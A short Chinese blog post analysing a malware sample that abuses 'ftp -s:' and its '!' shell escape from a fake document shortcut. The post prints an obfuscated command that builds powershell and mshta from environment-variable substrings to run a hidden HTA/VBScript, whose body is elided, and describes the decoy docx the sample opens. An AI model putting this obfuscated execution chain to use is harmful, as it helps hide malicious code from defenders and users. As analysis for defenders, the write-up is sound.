不是太新奇的技术,可以不必大惊小怪。
在看雪论坛看到使用FTP执行恶意代码的病毒样本。ftp -s:filename指定包含FTP命令的文本文件,使用!号是转义到shell。
样本伪装的文档快捷方式调用ftp.exe进行执行命令。而调用的恶意代码是隐写到文档里的,开头用ftp执行了内置的!转到shell执行了powershell.exe mshta.exe ccc.dat这条命令,用powershell.exe运行mshta.exe执行了ccc.dat里面的vbscript脚本。然后从ccc.dat中释放出一个正常的drc.docx文档到C:\ProgramData\drc.docx并且打开。
ftp -s:ccc.dat
ccc.dat
! %ProgramData:~3,1%%ProgramData:~5,1%wer%windir:~-1,1%hell.exe m%windir:~-1,1%hta.exe '%cd%\ccc.dat'
<!DOCTYPE html>
<html>
<head>
<HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" />
<script type="text/vbscript">
XXXXX
</script>
</head>
<body>
</body>
</html>https://mp.weixin.qq.com/s/SXbQ_-Ik13m66rppxls9bw
原文:https://www.cnblogs.com/17bdw/p/12110218.html